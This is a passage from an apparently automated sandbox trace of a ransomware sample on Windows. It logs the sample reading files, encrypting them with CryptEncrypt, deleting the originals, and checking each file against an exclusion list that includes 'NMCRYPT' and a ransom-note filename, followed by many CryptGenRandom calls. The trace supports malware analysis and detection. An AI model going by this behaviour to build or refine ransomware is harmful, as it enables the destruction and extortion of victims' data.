lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.108] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.108] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.108] GetLastError () returned 0x0 [0164.108] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.108] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x60, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x60, lpOverlapped=0x0) returned 1 [0164.108] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x60, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x70) returned 1 [0164.108] GetLastError () returned 0x0 [0164.108] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x70, lpOverlapped=0x0) returned 1 [0164.108] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0164.108] WriteFile (in: hFile=0x588, lpBuffer=0x2895990*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0164.109] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Month_Calendar.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf")) returned 0x20 [0164.109] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Month_Calendar.emf", dwFileAttributes=0x20) returned 0 [0164.109] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Month_Calendar.emf") returned 1 [0164.109] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Month_Calendar.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf")) returned 0 [0164.109] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Month_Calendar.emf" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Month_Calendar.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Month_Calendar.emf" [0164.109] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Month_Calendar.emf" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0164.109] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF479.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf479.tmp")) returned 0xf479 [0164.110] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Month_Calendar.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF479.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf479.tmp"), dwFlags=0x1) returned 0 [0164.110] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF479.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf479.tmp")) returned 1 [0164.110] CryptDestroyKey (hKey=0x9ad438) returned 1 [0164.110] wcslen (_String="OK") returned 0x2 [0164.110] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.110] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.110] CryptDestroyKey (hKey=0x9ad3b8) returned 1 [0164.110] CryptDestroyHash (hHash=0x9ad738) returned 1 [0164.110] CryptReleaseContext (hProv=0x8e2d58, dwFlags=0x0) returned 1 [0164.110] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*NMCRYPT") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*Recovers your files.html") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*.exe") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*.dll") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*.lnk") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*.bat") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*.ini") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*.msi") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*.scf") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*pagefile.sys*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*NTUSER.DAT*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*AppData*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*\\winrar\\*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*\\Internet Explorer\\*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*\\java\\*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*\\TeamViewer\\*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*\\windows\\*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*\\ESET\\*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*\\AVG\\*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*\\AVIRA\\*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*\\AVAST Software\\*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*Atheros*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*Realtek*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*bootmgr*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*boot*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*boot*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*CONFIG.SYS*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*IO.SYS*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*MSDOS.SYS*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*NTDETECT.COM*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*ntldr*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*chrome*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*opera*") returned 0 [0164.111] PathMatchSpecW (pszFile="Music.emf", pszSpec="*firefox*") returned 0 [0164.111] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Music.emf", pszSpec="*") returned 1 [0164.111] strlen (_Str="NMoreira") returned 0x8 [0164.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | 